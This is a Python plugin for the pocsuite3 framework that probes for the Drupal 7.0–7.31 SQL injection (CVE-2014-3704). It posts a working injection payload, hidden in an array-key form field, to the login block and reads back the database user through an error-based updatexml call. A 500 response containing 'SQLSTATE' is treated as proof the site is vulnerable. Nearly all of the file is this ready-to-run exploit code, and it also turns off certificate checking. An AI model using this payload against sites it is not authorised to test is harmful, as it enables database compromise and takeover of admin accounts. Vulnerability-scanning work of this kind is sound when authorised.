from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
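class DemoPOC(POCBase):
    """pocsuite3 verification plugin for the Drupal 7.0-7.31 SQL injection (CVE-2014-3704).

    ``_verify`` sends a single POST to the login form and treats an HTTP 500
    whose body mentions ``SQLSTATE`` as the vulnerable signature;
    ``parse_verify`` wraps that result in the framework's ``Output`` object.
    The class attributes are the metadata pocsuite3 reads when listing POCs.
    """

    vulID = '002'  # ssvid
    version = '1.0'
    name = 'Drupal SQL Inject'
    appName = 'Drupal'
    appVersion = '7.0~7.31'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        """Probe ``self.url`` once and report whether the SQL-error signature appears.

        Returns:
            The ``Output`` built by ``parse_verify`` — success (carrying the
            probed URL and the request body) when the response is a 500 that
            contains ``SQLSTATE``, fail otherwise — or ``None`` when the HTTP
            request itself raised, which is kept from the original so the
            framework sees the same "no result" value on network failure.
        """
        result = {}
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Content-Length is derived from ``data`` by requests; the original
            # pinned it to '120', a value that silently goes stale if the body changes.
        }
        # Avoid a doubled slash when the configured target already ends with '/'.
        target = self.url.rstrip('/') + "/?q=node&destination=node"
        data = "pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a"
        try:
            # verify=False is inherited from the original: any certificate is
            # accepted, so the scan traffic itself is not protected against interception.
            r = requests.post(url=target, timeout=8, verify=False, headers=headers, data=data)
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # still propagate; a timeout or connection error is not evidence either way.
            return None
        # Signature: Drupal's DB layer surfaces the PDO error as a 500 page
        # containing the SQLSTATE code.
        if r.status_code == 500 and "SQLSTATE" in r.text:
            result['FileInfo'] = {'URL': target, 'POC': data}
        return self.parse_verify(result)

    def parse_verify(self, result):
        """Convert the dict produced by ``_verify`` into a framework ``Output``.

        Args:
            result: the evidence dict; any non-empty value means "vulnerable".

        Returns:
            An ``Output`` marked success with ``result`` attached, or marked
            fail with the message ``'target is not vulnerable'``.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output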
# Register the class with pocsuite3 so the framework can discover and run it.
register_poc(DemoPOC)